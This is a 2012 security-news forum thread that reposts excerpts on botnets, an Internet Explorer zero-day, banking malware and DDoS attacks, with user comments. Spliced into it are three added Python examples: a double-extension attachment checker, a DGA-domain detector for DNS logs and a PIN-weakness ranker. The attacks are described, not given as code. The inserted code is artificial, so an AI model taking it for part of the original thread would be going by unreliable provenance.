A gap in security from within the PC supply chain has led Microsoft to take action against a botnet known as Nitol. The Redmond Washington-based software vendor has also been given court authority to assume control of the 3322.org domain and approximately 70,000 subdomains that are believed to be hosting the attacks.
It is believed that the malware was loaded, from some undetermined point in the supply chain, onto brand-new PCs produced in China, which were then distributed across the globe in an already-infected state. The same machines also appear to be running counterfeit versions of Windows.
Most of the infections have been found in China, but approximately 10 percent of the devices are believed to have been shipped to the United States. Most of the command-and-control servers are believed to be located in China.
Read more at :
http://www.crn.com/news/security/240007336/microsoft-takes-aim-at-nitol-botnet.htm?cid=nl_sec
***
-
***
Microsoft to Patch Adobe Flash Player in Windows 8 'Shortly'
Microsoft is working with Adobe Systems to patch vulnerabilities in Adobe Flash Player affecting Windows 8, apparently changing course and choosing to push out a fix before the operating system hits stores next month.
In Windows 8, Microsoft has opted to embed Flash Player in Internet Explorer 10 (IE 10). Last week, the company said publicly that it would wait until Windows 8 was generally available before patching Flash Player with the latest updates issued last month by Adobe.
However, in a statement Sept. 13, a Microsoft spokesperson told eWEEK that the company is working with Adobe to release an update for Flash in IE 10 that will be available shortly. Since Flash Player is embedded in IE 10, Microsoft will be responsible for patching it for Windows 8 users.
Read more at :
http://www.eweek.com/c/a/Security/Microsoft-to-Patch-Adobe-Flash-Player-in-Windows-8-Shortly-435077/?kc=EWKNLEDP09172012B
***
-
***
Zero-Day Season Is Really Not Over Yet
I can confirm, the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually exploited in the wild.
First I would like to thank the nice people (@binjo, @_sinn3r and all the guys of the Metasploit IRC channel on freenode) who helped me to understand and go further in my investigations.
Since the release of the Java SE 7 0day I was monitoring some of the infected servers used by the alleged Nitro gang. The 14th September morning, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).
See & read more at :
http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
***
-
***
New Metasploit 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7
We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.
See & read more at :
https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit
***
-
***
Phonetic attack commands crash bank phone lines
Touch tone and voice activated systems open to attack.
A security researcher has demonstrated a series of attacks capable of disabling touch tone and voice activated phone systems or forcing them to disclose sensitive information.
In one test, a phone system run by an unnamed Indian bank had dumped customer PINs.
Attacks including blind SQL injection and buffer overflows could be served to almost any interactive voice response (IVR) phone system, according to Rahul Sasi, a security researcher with iSight Partners.
He said the attacks could take down critical phone systems, cutting off banking services or the ability of call centres to field customer inquiries.
“If someone can crash a banking app from anywhere in the world, that’s critical,” Sasi said.
“No banks or organisations are testing IVRs because they think the systems are secure, but in reality they are not. No firewall or CAPTCHAs monitor voice traffic.”
Read more at :
http://www.scmagazine.com.au/News/315844,phonetic-attack-commands-crash-bank-phone-lines.aspx
***
-
***
ID Theft Service Tied to Payday Loan Sites
A Web site that sells Social Security numbers, bank account information and other sensitive data on millions of Americans appears to be obtaining at least some of its records from a network of hacked or complicit payday loan sites.
Usearching.info boasts the “most updated database about USA,” and offers the ability to purchase personal information on countless Americans, including SSN, mother’s maiden name, date of birth, email address, and physical address, as well as driver license data for approximately 75 million citizens in Florida, Idaho, Iowa, Minnesota, Mississippi, Ohio, Texas and Wisconsin.
Users can search for an individual’s information by name, city and state (for .3 credits per search), and from there it costs 2.7 credits per SSN or DOB record (between $1.61 to $2.24 per record, depending on the volume of credits purchased). This portion of the service is remarkably similar to an underground site I profiled last year which sold the same type of information, even offering a reseller plan.
What sets this service apart is the addition of more than 330,000 records (plus more being added each day) that appear to be connected to a satellite of Web sites that negotiate with a variety of lenders to offer payday loans.
Read much more at :
http://krebsonsecurity.com/2012/09/id-theft-service-tied-to-payday-loan-sites/
***
-
***
Malware attack blasted out in "Important Changes to Microsoft Services agreement" email
If you received an email, apparently from Microsoft, claiming to be about "Important Changes to Microsoft Services Agreement" would you trust it?
From the naked eye, after all, it looks professionally presented, has Microsoft's funky new logo.. what could be wrong with this?
The text of the email *is* apparently genuine, as there was an actual Microsoft message - dated August 27 - that can be viewed here.
The clue which should ring your alarm bells about this latest email, however, comes in the attached file: Microsoft-Services-Agreement.pdf.exe.
To those lacking in caution (or indeed, those Windows users who haven't told their operating system to show filenames in full) the attached file might appear to be an Adobe PDF document rather than an executable file.
But sure enough, it is an EXE file. And it will embed itself as a backdoor Trojan horse in your Registry to automatically run on startup.
Read more at :
http://nakedsecurity.sophos.com/2012/09/17/malware-attack-blasted-out-in-important-changes-to-microsoft-services-agreement-email/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
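Added example (not from the Sophos article): a small Python check for the double-extension trick described above. It shows what the attachment name looks like once Windows hides the final extension, flags an executable hiding behind a document extension, and compares the claimed extension with the file's leading bytes. The extension lists, magic-byte table and sample names are constructed for the demo.

```python
import os

# Extensions Windows runs directly on double-click (a representative subset).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".msi", ".js", ".jse", ".vbs", ".vbe", ".jar", ".hta"}
# Document-looking extensions that attackers place in front of the real one.
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt",
                       ".pptx", ".rtf", ".txt", ".jpg", ".jpeg", ".png"}
# Leading bytes of a few formats, to compare the name with the content.
MAGIC = [(b"MZ", "exe"), (b"%PDF-", "pdf"), (b"\x89PNG", "png"),
         (b"\xff\xd8\xff", "jpg"), (b"PK\x03\x04", "zip")]
# What each extension's content should start with (zip-based Office too).
EXPECTED_KIND = {".exe": "exe", ".scr": "exe", ".pdf": "pdf", ".png": "png",
                 ".jpg": "jpg", ".jpeg": "jpg", ".docx": "zip", ".xlsx": "zip",
                 ".pptx": "zip", ".jar": "zip", ".zip": "zip"}


def split_extensions(filename):
    """'Agreement.pdf.exe' -> ('Agreement', ['.pdf', '.exe']), lower-cased."""
    stem, exts = filename, []
    while True:
        base, ext = os.path.splitext(stem)
        if not ext or not base:
            break
        exts.insert(0, ext.lower())
        stem = base
    return stem, exts


def shown_with_hidden_extensions(filename):
    """Name as Explorer displays it with 'Hide extensions for known file
    types' on: only the final extension disappears, the decoy stays."""
    _, exts = split_extensions(filename)
    return filename[:-len(exts[-1])] if exts else filename


def sniff_type(head):
    """Crude content-type detection from the first bytes of the file."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def content_matches_name(filename, head):
    """True/False when the last extension implies a known format, else None."""
    _, exts = split_extensions(filename)
    expected = EXPECTED_KIND.get(exts[-1]) if exts else None
    if expected is None:
        return None
    return sniff_type(head) == expected


def assess_attachment(filename, head=b""):
    """Policy decision for one mail attachment. The last extension is the one
    Windows acts on; anything before it is at best a decoy."""
    _, exts = split_extensions(filename)
    real = exts[-1] if exts else ""
    decoys = [e for e in exts[:-1] if e in DOCUMENT_EXTENSIONS]
    match = content_matches_name(filename, head) if head else None
    if real in EXECUTABLE_EXTENSIONS and decoys:
        verdict, reason = "block", f"executable {real} disguised as {decoys[-1]}"
    elif real in EXECUTABLE_EXTENSIONS:
        verdict, reason = "block", f"executable attachment ({real})"
    elif match is False:
        verdict, reason = "block", f"content is {sniff_type(head)}, name claims {real}"
    else:
        verdict, reason = "allow", "no executable extension or content mismatch"
    return {"file": filename, "shown_as": shown_with_hidden_extensions(filename),
            "real_extension": real, "verdict": verdict, "reason": reason}


if __name__ == "__main__":
    # Constructed samples: the attachment named in the article, a genuine PDF,
    # and a PE file simply renamed to .pdf (caught by the magic-byte check).
    samples = [("Microsoft-Services-Agreement.pdf.exe", b"MZ\x90\x00\x03\x00"),
               ("invoice.pdf", b"%PDF-1.4\n%"),
               ("statement.pdf", b"MZ\x90\x00\x03\x00")]
    for name, head in samples:
        r = assess_attachment(name, head)
        print(f"{r['file']:40} shown as {r['shown_as']:36} -> {r['verdict']}: {r['reason']}")
```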
-
***
Banking malware Tinba infects 60,000 users in Turkey
The threat was named Tinba, or Tinybanker, because of its small size among banking malware, approximately 20 kilobytes ......
Tinba has affected more than 60,000 users in Turkey, primarily stealing login details from sites like Facebook, free German webmail service GMX, Google and Microsoft. The malware has also targeted government portals and Turkish banks to steal login information. Its infrastructure is believed to be located in Russia and Lithuania.
Read more at :
http://www.scmagazine.com/banking-malware-tinba-infects-60000-users-in-turkey/article/259138/
***
-
Internet Explorer security hole: Use other browser
INTERNET Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows' native web browser.
According to security forum Rapid7, Internet Explorer 7, 8 and 9 operating on Windows XP, Vista and Seven contains what is known as a "zero day exploit" which allows attackers to gain access to your personal data while you browse.
The forum claimed the exploit would give cyber criminals "the same privileges as the current user".
It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.
Microsoft confirmed that it was aware of the targeted attacks "potentially affecting some versions of Internet Explorer".
Director of Microsoft Trustworthy Computer, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.
"We recommend customers deploy Microsoft's Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience," he said. "We will continue to investigate this issue and take further actions as appropriate."
http://www.dailytelegraph.com.au/technology/internet-explorer-security-hole-use-other-browser/story-fn5h1vlf-1226476456634
Microsoft urges computer users to install security tool
http://www.theage.com.au/it-pro/security-it/microsoft--urges-computer-users-to-install-security-tool-20120918-263vv.html
-
WTF! Mr.Flame has brothers that are unknown. :o
https://www.securelist.com/en/blog/750/Full_Analysis_of_Flame_s_Command_Control_servers
The C&C code handles four different malware - named SP, SPE, FL and IP by the authors
The most recent malware is called "IP" and it is yet unknown.
Of the four malware, only Flame is known; the other three are currently unknown.
The development of the platform C&C code started as early as December 2006.
-
Internet Explorer security hole: Use other browser
INTERNET Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows' native web browser.
According to security forum Rapid7, Internet Explorer 7, 8 and 9 operating on Windows XP, Vista and Seven contains what is known as a "zero day exploit" which allows attackers to gain access to your personal data while you browse.
The forum claimed the exploit would give cyber criminals "the same privileges as the current user".
It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.
Microsoft confirmed that it was aware of the targeted attacks "potentially affecting some versions of Internet Explorer".
Director of Microsoft Trustworthy Computer, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.
"We recommend customers deploy Microsoft's Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience," he said. "We will continue to investigate this issue and take further actions as appropriate."
http://www.dailytelegraph.com.au/technology/internet-explorer-security-hole-use-other-browser/story-fn5h1vlf-1226476456634
Microsoft urges computer users to install security tool
http://www.theage.com.au/it-pro/security-it/microsoft--urges-computer-users-to-install-security-tool-20120918-263vv.html
IE10 is not affected. (There are advantages to running windows 8. :)
-
Nor is Firefox or Chrome only IE, so win8 not required :P
-
IE10 is not affected. (There are advantages to running windows 8. :)
Shhhhhh, Bob. I'm sure W7 users will be very happy staying where they are, and I'm not sure they wanted to upgrade from W7 to W8. I'd better grab W7 soon for my desktop computer, as I already have a laptop with W7 64-bit for my Revit structural engineering design use ;)
-
***
Google Adding 'Do Not Track' Into Chrome's Latest Developer Build
The privacy feature won't be available built-in for Chrome users until the release version of the next browser is ready, but the project is being pursued.
Google's Chrome browser project is beginning to add built-in "Do Not Track" capabilities to the latest developer's build of the open-source Web browser.
Do Not Track capabilities mean that users can choose to instruct their Web browsers not to show personal information about their Web searches using the Do Not Track controls that are being integrated into some browsers. By hiding information about their searches, users can block advertisers and Web sites from collecting and using that information to push targeted online ads and gain details about their surfing.
Read more at :
http://www.eweek.com/c/a/Security/Google-Adding-Do-No-Track-Into-Chromes-Latest-Developer-Build-852453/?kc=EWKNLEDP09182012B
***
-
Link for the IE security tool with a description .. http://www.geekstogo.com/
-
***
Thanks for the above post, essexboy !
***
-
***
Malwarebytes Takes First Step Toward Enterprise With New Offering
An anti-malware vendor widely known for its consumer appeal has launched a business-class edition aimed at a wide variety of vertical markets as well as government and education.
San Jose-based Malwarebytes has rolled out its new Malwarebytes Enterprise Edition, which offers centrally-managed threat protection and malware remediation that runs on top of existing security infrastructures, including anti-virus. The product is designed to work in both physical and virtualized environments.
The product leverages the experience gained from the extremely popular Malwarebytes Anti-Malware product, which has been used by over 150 million people worldwide to block or remove over five billion pieces of malware. The enterprise edition is aimed at protecting companies of all sizes from the threats posed by cutting-edge malware such as zero-day, polymorphic and blended malware threats that can evade traditional enterprise anti-virus solutions.
Read more at :
http://www.crn.com/news/security/240007415/malwarebytes-takes-first-step-toward-enterprise-with-new-offering.htm?cid=nl_sec&elqTrack=true
***
-
An easier way to exploit the new IE zero day is via an additional vulnerable java.dll.
Therefore, again, users are more secure without Java on their computers.
If you absolutely need Java to run some critical service (for online banking etc.),
then use the latest updated and patched Java version.
Whenever you do not need Java,
here is another valid reason to uninstall Java altogether.
polonus
-
The current IE exploit only works on these systems by exploiting another flaw in older versions of Java 6. If you have Vista or Windows 7 the best mitigation is to be sure Java is up-to-date, or uninstall it if not needed.
More details on the IE exploit
-
A fix for the new 0-day IE exploit is being prepared and will reach us within a couple of days, according to Microsoft Security Response Center: http://blogs.technet.com/b/msrc/archive/2012/09/18/additional-information-about-internet-explorer-and-security-advisory-2757760.aspx
link article author: Yunsun Wee, Director, Trustworthy Computing
polonus
-
Jindřich Kubec September 19th, 2012
New Microsoft IE Zero-day attack
http://blog.avast.com/2012/09/19/new-msie-0day-attack/#more-9550
-
***
Bank of America Hit By Cyber Attack
Bank of America’s (BAC) website was experiencing sporadic outages on Tuesday related to a cyber attack that may be tied to an Islamic terrorist group, according to a source close to the matter.
The Charlotte, N.C.-based bank’s namesake site, bankofamerica.com, was not loading as of 4:15 p.m. ET and has been inaccessible for some users.
A source confirms to FOX Business that Bank of America’s website was in fact hit by a cyber attack. It was a “technical attack” that was focused on BofA’s domain name service (DNS) infrastructure.
A BofA spokesman said "some customers may experience occasional slowness" but the bank is "working to ensure full availability." BofA wouldn't comment on the attacks specifically, but the spokesman said, "I can tell you we continuously take proactive measures to secure our systems."
A group called “Izz ad-din Al qassam Brigades” has claimed responsibility on PasteBin, which is a forum commonly used by these types of groups, including Anonymous, to issue threats or to brag about cyber attacks. In addition to the BofA attack, Izz ad-din Al qassam also said it is targeting the website of the New York Stock Exchange.
If I were a BoA customer (thankfully I'm not), I would not be doing any on-line banking for this week.
Read more at :
http://www.foxbusiness.com/industries/2012/09/18/bank-america-website-experiencing-sporadic-outages/?cmpid=cmty_twitter_fb
***
-
***
Real-World Developers Still Not Coding Securely
Though secure development lifecycle advocates have shown the cost benefits of catching vulnerabilities before apps go live, organizations still don't embed security into development
The extreme pressure on developers from line-of-business leaders to push out new web application feature sets as quickly as possible, combined with a lack of security development objectives or actionable security guidance, continues to negatively impact web application vulnerability levels. A new study out this week based on a survey conducted by Forrester Research on behalf of Coverity showed web application incidents still remain expensive as a result of these vulnerabilities and are costing some organizations hundreds of thousands to millions of dollars.
Read more at :
http://www.darkreading.com/vulnerability-management/167901026/security/news/240007576/real-world-developers-still-not-coding-securely.html
***
-
***
Exploit beamed via NFC to hack Samsung Galaxy S3 (Android 4.0.4)
According to Erasmus, the exploit was delivered via NFC, the short-range wireless technology allows the sharing of small payloads of data between an NFC tag and an Android-powered device. The hackers exploited a weakness in the way NFC is implemented in the Galaxy S3 to deliver a malicious file that was automatically opened by the Android document viewer.
Once the file opened, the team exploited a zero-day flaw in the document viewer to launch a code execution attack. A second Android privilege escalation vulnerability, also zero-day, was then used to get full rights on the device.
Read more at :
http://www.zdnet.com/exploit-beamed-via-nfc-to-hack-samsung-galaxy-s3-android-4-0-4-7000004510/
***
-
***
Majority of companies suffered a web application security breach
Web application security incidents have become increasingly common and expensive, with the majority of companies experiencing at least one breach in the last 18 months and many companies losing hundreds of thousands, if not millions, of dollars as a result, according to Forrester Consulting.
At the same time, the study found that the majority of companies have yet to implement secure development practices, most often citing time-to-market pressures, funding and the lack of appropriate technologies suitable for use during development as their primary roadblocks.
See & read more at :
http://www.net-security.org/secworld.php?id=13613
***
-
***
Anonymous: behind the masks of the cyber insurgents
Since 2008, the internet collective have hacked the CIA, the Sun newspaper, the Church of Scientology and a host of other large corporations, sparking a global police crackdown last year. But who and what are Anonymous? A radical new form of activism – or just bored teenagers? We talk to some of the 'hacktivists' and the experts who tracked them down in the deep web.
For a period in 2011, LulzSec – an offshoot of Anonymous, the internet "hacktivist" collective who came to prominence around the time of the Wikileaks affair – wreaked a trail of chaos across the web. Their actions ranged from the transgressive – they had taken down the CIA's website and hacked into Sony's database and released more than a million user names and passwords – to the absurd: after the American network PBS aired a critical documentary about Julian Assange, LulzSec hacked into their website and replaced the homepage with an article about Tupac Shakur, the (very much dead) rapper, which bore the headline "Tupac Still Alive in New Zealand". During the Arab spring, members of the group hacked and defaced Tunisian and Egyptian government sites. One hacker, Tflow (later discovered to be a 16-year-old London schoolboy), allegedly wrote a webscript that enabled activists to circumvent government snooping.
Read much more at :
http://www.guardian.co.uk/technology/2012/sep/08/anonymous-behind-masks-cyber-insurgents
-
***
Over 9 million PCs infected - ZeroAccess botnet uncovered
ZeroAccess is a hugely widespread malware threat that has plagued individuals and enterprises for years. It has evolved over time to cater for new architectures and new versions of Windows.
ZeroAccess uses a peer-to-peer network to download plugin files which carry out various tasks designed to generate revenue for the botnet owners. Our researchers monitored this network for a period of two months to discover where in the world the peers were located and what kind of files the botnet was being instructed to download.
We found the IP addresses of infected machines from a total of 198 countries ranging from the tiny island nation of Kiribati to the Himalayan Kingdom of Bhutan, as can be seen when the infected machines are plotted on a world map.
See & read more at :
http://nakedsecurity.sophos.com/2012/09/19/zeroaccess-botnet-uncovered/?utm_campaign=naked%2Bsecurity&utm_medium=status%2Bmessage&utm_source=twitter
***
-
MSFixit to install the EMET for the IE vulnerability .. Also a patch is being issued tomorrow via windows updates http://support.microsoft.com/kb/2757760
-
***
DoS Attacks Continue to Move Up OSI Stack
Denial of service attacks continue to become increasingly prevalent in the world of the black hat, and also continue to move up the OSI stack from the network level toward the application level, according to the most recent research to be released by Imperva.
While early versions of DoS attacks that tended to focus at the network layer were aimed at shutting down server ports, the most modern strategies moved straight up the stack to the application level, according to Tal Beery, Security Researcher at Imperva, a Redwood Shores, Calif.-based company focused on application and data security.
Read much more at :
http://www.crn.com/news/security/240007652/imperva-study-dos-attacks-continue-to-move-up-osi-stack.htm?cid=nl_sec&elqTrack=true
***
-
***
Mac Attacks: Top 10 Bugs Targeting Apple
More Secure, Or Maybe Not
While some people claim that Macs are more secure, others maintain that they merely present a lower profile, given that most businesses for a long time standardized almost exclusively on the PC except, of course, for a smattering of artsy folks who were allowed to use Macs.
With the growth of Mac use comes the growth of Mac specific malware. This is in relation to the OS since just a couple of years ago Apple changed from using specialty hardware to becoming just another PC (non-specialty hardware) with a different OS than Windows, etc. Expect to see more Mac malware in the future.
See & read more at :
http://www.crn.com/slide-shows/security/240007729/mac-attacks-top-10-bugs-targeting-apple.htm?pgno=1
***
-
***
New TDL4 Bootkit Malware Variant Hits Fortune 500
Security vendor Damballa Labs has discovered a new variant of the TDSS/TDL4 malware that has apparently hit about 250,000 unique victims and at least 46 Fortune 500 companies, governmental agencies and ISP networks.
The malware uses highly secure domain generation algorithm (DGA)-based command-and-control (C&C) for communication, providing the controllers with details on click-fraud activity while at the same time avoiding network layer domain blacklists and signature-based filters.
Read much more at :
http://www.crn.com/news/security/240007636/new-tdl4-bootkit-malware-variant-hits-fortune-500.htm?cid=nl_sec&elqTrack=true
***
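The CRN item above says the C&C domains are generated algorithmically so that static blacklists never catch up. Below is an added illustration of the defensive side of that: a heuristic pass over DNS query logs that scores second-level labels for the random-looking shape DGA output tends to have. It is not Damballa's method and not TDL4's actual generator (the post gives no details of it); the log lines are constructed and the thresholds are assumptions chosen for illustration.

```python
"""Heuristic triage of DNS query logs for DGA-looking domain names.

Added example, not Damballa's method and not TDL4's actual DGA (the post
gives no details of it): the log lines below are constructed and the
thresholds are assumptions chosen for illustration.
"""
import math
from collections import Counter

# Constructed DNS query log: "<timestamp> <client> <queried name>"
DNS_LOG = """\
2012-09-20T10:00:01 10.0.0.5 www.example.com
2012-09-20T10:00:02 10.0.0.5 update.example.org
2012-09-20T10:00:03 10.0.0.7 xkq7v2hd9mzt.com
2012-09-20T10:00:03 10.0.0.7 b3r9wlqpt0zx.net
2012-09-20T10:00:04 10.0.0.7 qz81mvx0kprl.com
2012-09-20T10:00:05 10.0.0.9 mail.example.com
2012-09-20T10:00:06 10.0.0.7 ywb5nzk2qh7c.org
"""

VOWELS = set("aeiou")


def second_level_label(qname):
    """'www.example.com' -> 'example' (no public-suffix list; assumption)."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s):
    """Bits per character; random-looking labels score higher."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def dga_score(qname):
    """0..3: one point each for high entropy, few vowels, many digits."""
    label = second_level_label(qname)
    if len(label) < 7:          # short labels give too little signal
        return 0
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = sum(ch in VOWELS for ch in letters) / len(letters) if letters else 0.0
    digit_ratio = sum(ch.isdigit() for ch in label) / len(label)
    score = 0
    if shannon_entropy(label) > 3.2:
        score += 1
    if vowel_ratio < 0.25:
        score += 1
    if digit_ratio > 0.2:
        score += 1
    return score


def flag_dga_lookups(log, min_score=2):
    """Return (client, qname, score) for every lookup at or above min_score."""
    flagged = []
    for line in log.splitlines():
        _ts, client, qname = line.split()
        score = dga_score(qname)
        if score >= min_score:
            flagged.append((client, qname, score))
    return flagged


def clients_by_hits(log, min_score=2):
    """Count flagged lookups per client; a burst from one host is the tell."""
    return Counter(client for client, _q, _s in flag_dga_lookups(log, min_score))
```

The per-client count matters more than any single name: CDN and cloud hostnames also look random, so a lone hit is noise, while one workstation resolving dozens of such names in a minute is what a DGA sweep looks like in the logs.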
-
***
Microsoft Security Bulletin MS12-063 - Critical
This security update resolves one publicly disclosed and four privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers. Internet Explorer 10 is not affected.
The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory.
Read more at :
http://technet.microsoft.com/en-us/security/bulletin/ms12-063
***
-
***
Microsoft Security Bulletin MS12-063 - Critical
This security update resolves one publicly disclosed and four privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers. Internet Explorer 10 is not affected.
The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory.
Read more at :
http://technet.microsoft.com/en-us/security/bulletin/ms12-063
***
Since this exploit is related to the flash player, there is also an update available for Windows 8.
Reading about it will not help..... Updating will. :)
-
***
There is a link for updating in the article. ;)
***
-
***
There is a link for updating in the article. ;)
***
You don't need a link simply use the Windows Update function. :)
Screenshot: http://my.jetscreenshot.com/2701/20120922-5jxz-36kb
-
***
Of course, that is true for you, me, and many others on this forum. But, we often get new computer users on this forum everyday.
The truth is, though, that not everyone uses MS auto-updates, and many have no idea about such critical updates that they seriously need to do. And those not using auto-updates rarely check for updates often enough.
Hence, my making the post to hopefully inform the unaware and the hope they will heed the serious need for this update.
***
-
***
17 Heavy Hitters On Apple's Security Team
Little is known about Apple's security team, and that's just the way Apple wants it. The company allows some of its security people to attend industry conferences and events, but they tend to keep a very low profile. Scanning LinkedIn provides a glimpse of the staff members and their roles, and following are 17 examples, many of whom you've probably never heard of before, and some of which appear to be pseudonyms.
Read much more at :
http://www.crn.com/news/security/240007794/17-heavy-hitters-on-apples-security-team.htm?cid=nl_vi&elqTrack=true
***
-
Elevated risk of Joomla and WordPress attacks, patch, update and upgrade: http://www.us-cert.gov/current/#increase_exploitation_in_web_content
Owners of CMS are being warned! Watch those logs and dorks....
polonus
-
Yet another Java zero day and 50 additional bugs found. Yes, a completely different one from the one last patched.
The question could be: "Is Oracle running Java into the ground?"
One Billion Users Affected!
Read here: http://news.softpedia.com/news/One-Billion-Users-Affected-by-Java-Security-Sandbox-Bypass-Vulnerability-Experts-Say-294629.shtml
The affected web browsers are Safari 5.1.7, Opera 12.02, Chrome 21.0.1180.89, Firefox 15.0.1, and Internet Explorer 9.0.8112.16421.
If you do not need Java on your comp, then uninstall....
polonus
-
PIN analysis
“All credit card PIN numbers in the World leaked” ;D
http://www.datagenetics.com/blog/september32012/index.html
-
PIN analysis
“All credit card PIN numbers in the World leaked” ;D
http://www.datagenetics.com/blog/september32012/index.html
Fascinating article, thanks. I emailed them asking if there was any way I could look up the ranking of a specific PIN ... I simply memorized the one my bank originally assigned me, and because it's (apparently) non-obvious, I've come to use the same PIN for other similar purposes, e.g., my Bell calling card. Naturally I'm curious to see where it ranks on their list.
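The article behind the two posts above ranks 4-digit PINs by how often people pick them, and the reply asks where a particular PIN would land. As an added example (not from the article or the posters), here is the ranking done over a constructed sample, plus a check for the structural tells that make a PIN guessable regardless of how rare it is; the sample and the year window are assumptions.

```python
"""Frequency ranking of 4-digit PINs plus a structural weakness check.

Added example prompted by the question in the reply above (where does a
given PIN rank?). The PIN sample is constructed; it is not the data set
analysed in the linked article.
"""
from collections import Counter

# Constructed sample of PIN choices (heavily skewed, as real samples are)
SAMPLE_PINS = (["1234"] * 12 + ["1111"] * 6 + ["0000"] * 4 + ["1212"] * 3
               + ["7777"] * 2 + ["2580"] * 2 + ["1986"] * 2
               + ["4857", "9302", "6173", "2049"])


def rank_pins(pins):
    """(pin, count) pairs, most common first; ties broken by PIN value."""
    return sorted(Counter(pins).items(), key=lambda kv: (-kv[1], kv[0]))


def rank_of(pin, pins):
    """1-based rank of `pin` in the sample, or None if nobody chose it."""
    for position, (candidate, _count) in enumerate(rank_pins(pins), start=1):
        if candidate == pin:
            return position
    return None


def weak_pin_reasons(pin, current_year=2012):
    """Structural tells that make a PIN guessable regardless of frequency."""
    reasons = []
    if len(set(pin)) == 1:
        reasons.append("single repeated digit")
    digits = [int(d) for d in pin]
    steps = {b - a for a, b in zip(digits, digits[1:])}
    if steps in ({1}, {-1}):
        reasons.append("ascending/descending run")
    if pin[:2] == pin[2:]:
        reasons.append("repeated pair")
    # Birth-year-like values; the window is an assumption for illustration
    if 1900 <= int(pin) <= current_year:
        reasons.append("looks like a year")
    return reasons


def share_of_top(pins, n=5):
    """Fraction of all users covered by the n most common PINs."""
    ranking = rank_pins(pins)
    return sum(count for _p, count in ranking[:n]) / len(pins)
```

`share_of_top` is the number that matters for an attacker with a handful of guesses before lockout, and for a bank deciding which PINs to refuse at enrolment: if a few PINs cover a large share of users, an issuer-assigned random PIN (as the reply describes) is the stronger default.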
-
***
Iran Denies Claims Of DoS Attack Against U.S. Banks
The head of the Iran's Civil Defense Organization has denied reports that his country has launched a series of denial-of-service attacks against U.S.-based banks. Gholam Reza Jalali told Fars News Agency (FNA), an Iranian news service, that the reports are part of a Western plot to establish justification for their own actions against Iran in cyberspace.
According to reports from a number of Western media, including NBC News, Reuters and the Chicago Tribune, a sporadic series of attacks against Bank of America, JPMorgan Chase and Citigroup have been underway since late 2011 and have occasionally caused minor interruptions of service. NBC News claims it has spoken with national security sources who tie these attacks to the Iranian government as a reaction to economic sanctions against Iran.
Read more at :
http://www.crn.com/news/security/240007869/iran-denies-claims-of-dos-attack-against-u-s-banks.htm?cid=nl_sec&elqTrack=true
***
-
***
Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent
A company whose software and services are used to remotely administer and monitor large sections of the energy industry began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Experts say digital fingerprints left behind by attackers point to a Chinese hacking group tied to repeated cyber-espionage campaigns against key Western interests.
The attack comes as U.S. policymakers remain gridlocked over legislation designed to beef up the cybersecurity posture of energy companies and other industries that maintain some of the world’s most vital information networks.
Read much more at :
http://krebsonsecurity.com/2012/09/chinese-hackers-blamed-for-intrusion-at-energy-industry-giant-telvent/
***
-
***
One server from the SourceForge.net mirror system was distributing a phpMyAdmin kit containing a backdoor.
